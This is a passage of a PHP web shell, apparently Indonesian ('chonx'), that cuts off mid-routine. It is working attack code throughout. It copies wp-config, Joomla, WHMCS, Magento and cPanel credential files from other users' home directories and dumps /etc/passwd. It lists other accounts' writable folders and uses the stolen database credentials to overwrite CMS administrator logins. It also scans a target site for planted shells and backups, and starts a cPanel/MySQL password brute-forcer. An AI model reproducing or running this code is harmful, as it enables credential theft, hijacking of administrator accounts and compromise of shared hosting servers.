  2743.                     "/home2/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2744.                     "/home2/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2745.                     "/home2/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2746.                     "/home2/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2747.                     "/home2/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2748.                     "/home2/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2749.                     "/home2/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2750.                     "/home2/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2751.                     "/home2/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2752.                     "/home2/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2753.                     "/home2/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2754.                     "/home2/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2755.                     "/home2/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2756.                     "/home2/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2757.                     "/home2/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2758.                     "/home2/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2759.                     "/home2/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2760.                     "/home2/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2761.                     "/home2/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2762.                     "/home2/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2763.                     "/home2/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2764.                     "/home2/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2765.                     "/home2/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2766.                     "/home2/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2767.                     "/home2/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2768.                     "/home2/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2769.                     "/home2/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2770.                     "/home2/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2771.                     "/home2/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2772.                     "/home2/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2773.                     "/home2/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2774.                     "/home2/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2775.                     "/home2/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2776.                     "/home2/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2777.                     "/home2/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2778.                     "/home2/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2779.                     "/home3/$user_chonx/.my.cnf" => "cpanel",
  2780.                     "/home3/$user_chonx/.accesshash" => "WHM-accesshash",
  2781.                     "/home3/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2782.                     "/home3/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2783.                     "/home3/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2784.                     "/home3/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2785.                     "/home3/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2786.                     "/home3/$user_chonx/public_html/forum/config.php" => "phpBB",
  2787.                     "/home3/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2788.                     "/home3/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2789.                     "/home3/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2790.                     "/home3/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2791.                     "/home3/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2792.                     "/home3/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2793.                     "/home3/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2794.                     "/home3/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2795.                     "/home3/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2796.                     "/home3/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2797.                     "/home3/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2798.                     "/home3/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2799.                     "/home3/$user_chonx/public_html/configuration.php" => "Joomla",                
  2800.                     "/home3/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2801.                     "/home3/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2802.                     "/home3/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2803.                     "/home3/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2804.                     "/home3/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2805.                     "/home3/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2806.                     "/home3/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2807.                     "/home3/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2808.                     "/home3/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2809.                     "/home3/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2810.                     "/home3/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2811.                     "/home3/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2812.                     "/home3/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2813.                     "/home3/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2814.                     "/home3/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2815.                     "/home3/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2816.                     "/home3/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2817.                     "/home3/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2818.                     "/home3/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2819.                     "/home3/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2820.                     "/home3/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2821.                     "/home3/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2822.                     "/home3/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2823.                     "/home3/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2824.                     "/home3/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2825.                     "/home3/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2826.                     "/home3/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2827.                     "/home3/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2828.                     "/home3/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2829.                     "/home3/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2830.                     "/home3/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2831.                     "/home3/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2832.                     "/home3/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2833.                     "/home3/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2834.                     "/home3/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2835.                     "/home3/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2836.                     "/home3/$user_chonx/public_html/wp-config.php" => "WordPress",
  2837.                     "/home3/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2838.                     "/home3/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2839.                     "/home3/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2840.                     "/home3/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2841.                     "/home3/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2842.                     "/home3/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2843.                     "/home3/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2844.                     "/home3/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2845.                     "/home3/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2846.                     "/home3/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2847.                     "/home3/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2848.                     "/home3/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2849.                     "/home3/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2850.                     "/home3/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2851.                     "/home3/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2852.                     "/home3/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2853.                     "/home3/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2854.                     "/home3/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2855.                     "/home3/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2856.                     "/home3/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2857.                     "/home3/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2858.                     "/home3/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2859.                     "/home3/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2860.                     "/home3/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2861.                     "/home3/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2862.                     "/home3/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2863.                     "/home3/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2864.                     "/home3/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2865.                     "/home3/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2866.                     "/home3/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2867.                     "/home3/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2868.                     "/home3/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2869.                     "/home3/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2870.                     "/home3/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2871.                     "/home3/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2872.                     "/home3/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal"                 
  2873.                         ); 
  2874.                     foreach($grab_config as $config => $nama_config) {
  2875.                         $ambil_config = file_get_contents($config);
  2876.                         if($ambil_config == '') {
  2877.                         } else {
  2878.                             $file_config = fopen("chonx_config/$user_chonx-$nama_config.txt","w");
  2879.                             fputs($file_config,$ambil_config);
  2880.                         }
  2881.                     }
  2882.                 }      
  2883.             }
  2884.             echo "<center><a href='?dir=$dir/chonx_config'><font color=lime>Done</font></a></center>";
  2885.             }else{
  2886.                
  2887.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2888.         echo file_get_contents('/etc/passwd');
  2889.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2890.         }
  2891. } elseif($_GET['do'] == 'jumping') {
  2892.     $i = 0;
  2893.     echo "<pre><div class='margin: 5px auto;'>";
  2894.     $etc = fopen("/etc/passwd", "r");
  2895.     while($passwd = fgets($etc)) {
  2896.         if($passwd == '' || !$etc) {
  2897.             echo "<font color=red>Can't read /etc/passwd</font>";
  2898.         } else {
  2899.             preg_match_all('/(.*?):x:/', $passwd, $user);
  2900.             foreach($user[1] as $users) {
  2901.                 $user_dir = "/home/$users/backupwordpress/";
  2902.                 if(is_readable($user_dir)) {
  2903.                     $i++;
  2904.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress</font></a><br>";
  2905.                     if(is_writable($user_dir)) {
  2906.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress/</font></a><br>";
  2907.                     }
  2908.                     echo $jrw;
  2909.                     $domain_jump = file_get_contents("/etc/named.conf");   
  2910.                     if($domain_jump == '') {
  2911.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2912.                     } else {
  2913.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2914.                         foreach($domains_jump[1] as $dj) {
  2915.                             $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2916.                             $user_url = $user_url['name'];
  2917.                             if($user_url == $users) {
  2918.                                 echo " => ( <u>$dj</u> )<br>";
  2919.                                 break;
  2920.                             }
  2921.                         }
  2922.                     }
  2923.                 }
  2924.             }
  2925.         }
  2926.     }
  2927.     if($i == 0) {
  2928.     } else {
  2929.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2930.     }
  2931.     echo "</div></pre>";
  2932. } elseif($_GET['do'] == 'auto_edit_user') {
  2933.     if($_POST['hajar']) {
  2934.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2935.             echo "username atau password harus lebih dari 6 karakter";
  2936.         } else {
  2937.             $user_baru = $_POST['user_baru'];
  2938.             $pass_baru = md5($_POST['pass_baru']);
  2939.             $conf = $_POST['config_dir'];
  2940.             $scan_conf = scandir($conf);
  2941.             foreach($scan_conf as $file_conf) {
  2942.                 if(!is_file("$conf/$file_conf")) continue;
  2943.                 $config = file_get_contents("$conf/$file_conf");
  2944.                 if(preg_match("/JConfig|joomla/",$config)) {
  2945.                     $dbhost = ambilkata($config,"host = '","'");
  2946.                     $dbuser = ambilkata($config,"user = '","'");
  2947.                     $dbpass = ambilkata($config,"password = '","'");
  2948.                     $dbname = ambilkata($config,"db = '","'");
  2949.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2950.                     $prefix = $dbprefix."users";
  2951.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2952.                     $db = mysql_select_db($dbname);
  2953.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2954.                     $result = mysql_fetch_array($q);
  2955.                     $id = $result['id'];
  2956.                     $site = ambilkata($config,"sitename = '","'");
  2957.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2958.                     echo "Config => ".$file_conf."<br>";
  2959.                     echo "CMS => Joomla<br>";
  2960.                     if($site == '') {
  2961.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2962.                     } else {
  2963.                         echo "Sitename => $site<br>";
  2964.                     }
  2965.                     if(!$update OR !$conn OR !$db) {
  2966.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2967.                     } else {
  2968.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2969.                     }
  2970.                     mysql_close($conn);
  2971.                 } elseif(preg_match("/WordPress/",$config)) {
  2972.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2973.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2974.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2975.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2976.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2977.                     $prefix = $dbprefix."users";
  2978.                     $option = $dbprefix."options";
  2979.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2980.                     $db = mysql_select_db($dbname);
  2981.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2982.                     $result = mysql_fetch_array($q);
  2983.                     $id = $result[ID];
  2984.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2985.                     $result2 = mysql_fetch_array($q2);
  2986.                     $target = $result2[option_value];
  2987.                     if($target == '') {
  2988.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2989.                     } else {
  2990.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2991.                     }
  2992.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2993.                     echo "Config => ".$file_conf."<br>";
  2994.                     echo "CMS => Wordpress<br>";
  2995.                     echo $url_target;
  2996.                     if(!$update OR !$conn OR !$db) {
  2997.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2998.                     } else {
  2999.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3000.                     }
  3001.                     mysql_close($conn);
  3002.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3003.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3004.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3005.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3006.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3007.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3008.                     $prefix = $dbprefix."admin_user";
  3009.                     $option = $dbprefix."core_config_data";
  3010.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3011.                     $db = mysql_select_db($dbname);
  3012.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3013.                     $result = mysql_fetch_array($q);
  3014.                     $id = $result[user_id];
  3015.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3016.                     $result2 = mysql_fetch_array($q2);
  3017.                     $target = $result2[value];
  3018.                     if($target == '') {
  3019.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3020.                     } else {
  3021.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3022.                     }
  3023.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3024.                     echo "Config => ".$file_conf."<br>";
  3025.                     echo "CMS => Magento<br>";
  3026.                     echo $url_target;
  3027.                     if(!$update OR !$conn OR !$db) {
  3028.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3029.                     } else {
  3030.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3031.                     }
  3032.                     mysql_close($conn);
  3033.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3034.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3035.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3036.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3037.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3038.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3039.                     $prefix = $dbprefix."user";
  3040.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3041.                     $db = mysql_select_db($dbname);
  3042.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3043.                     $result = mysql_fetch_array($q);
  3044.                     $id = $result[user_id];
  3045.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3046.                     if($target == '') {
  3047.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3048.                     } else {
  3049.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3050.                     }
  3051.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3052.                     echo "Config => ".$file_conf."<br>";
  3053.                     echo "CMS => OpenCart<br>";
  3054.                     echo $url_target;
  3055.                     if(!$update OR !$conn OR !$db) {
  3056.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3057.                     } else {
  3058.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3059.                     }
  3060.                     mysql_close($conn);
  3061.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3062.                     $dbhost = ambilkata($config,'server = "','"');
  3063.                     $dbuser = ambilkata($config,'username = "','"');
  3064.                     $dbpass = ambilkata($config,'password = "','"');
  3065.                     $dbname = ambilkata($config,'database = "','"');
  3066.                     $prefix = "users";
  3067.                     $option = "identitas";
  3068.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3069.                     $db = mysql_select_db($dbname);
  3070.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3071.                     $result = mysql_fetch_array($q);
  3072.                     $target = $result[alamat_website];
  3073.                     if($target == '') {
  3074.                         $target2 = $result[url];
  3075.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3076.                         if($target2 == '') {
  3077.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3078.                         } else {
  3079.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  3080.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3081.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3082.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3083.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3084.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3085.                             } else {
  3086.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3087.                             }
  3088.                         }
  3089.                     } else {
  3090.                         $cek_login = file_get_contents("$target/adminweb/");
  3091.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3092.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3093.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3094.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3095.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3096.                         } else {
  3097.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3098.                         }
  3099.                     }
  3100.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3101.                     echo "Config => ".$file_conf."<br>";
  3102.                     echo "CMS => Lokomedia<br>";
  3103.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3104.                         echo $url_target2;
  3105.                     } else {
  3106.                         echo $url_target;
  3107.                     }
  3108.                     if(!$update OR !$conn OR !$db) {
  3109.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3110.                     } else {
  3111.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3112.                     }
  3113.                     mysql_close($conn);
  3114.                 }
  3115.             }
  3116.         }
  3117.     } else {
  3118.         echo "<center>
  3119.         <h1>Auto Edit User Config</h1>
  3120.         <form method='post'>
  3121.         DIR Config: <br>
  3122.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3123.         Set User & Pass: <br>
  3124.         <input type='text' name='user_baru' value='achonx' placeholder='user_baru'><br>
  3125.         <input type='text' name='pass_baru' value='achonx' placeholder='pass_baru'><br>
  3126.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3127.         </form>
  3128.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3129.         ";
  3130.     }
  3131. }elseif($_GET['do'] == 'shelscan') {
  3132.     echo'<center><h2>Shell Finder</h2>
  3133. <form action="" method="post">
  3134. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3135. <br>
  3136. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  3137. </form><br>';
  3138. if (isset($_POST["scan"])) {  
  3139. $url = $_POST['traget'];
  3140. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3141. echo "Result :<br />";
  3142. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3143. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3144. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3145. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3146. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3147. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3148. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3149. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3150. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3151. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3152. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3153. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3154. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3155. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3156. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3157. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3158. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3159. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3160. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3161. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3162. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3163. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3164. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3165. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3166. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","chonx.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3167. foreach ($shells as $shell){
  3168. $headers = get_headers("$url$shell"); //
  3169. if (eregi('200', $headers[0])) {
  3170. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3171. $dz = fopen('shells.txt', 'a+');
  3172. $suck = "$url$shell";
  3173. fwrite($dz, $suck."\n");
  3174. }
  3175. }
  3176. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3177. }
  3178.    
  3179. }
  3180.  elseif($_GET['do'] == 'cpanel') {
  3181.     if($_POST['crack']) {
  3182.         $usercp = explode("\r\n", $_POST['user_cp']);
  3183.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3184.         $i = 0;
  3185.         foreach($usercp as $ucp) {
  3186.             foreach($passcp as $pcp) {
  3187.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3188.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3189.                     } else {
  3190.                         $_SESSION[$ucp] = "1";
  3191.                         $_SESSION[$pcp] = "1";
  3192.                         $i++;
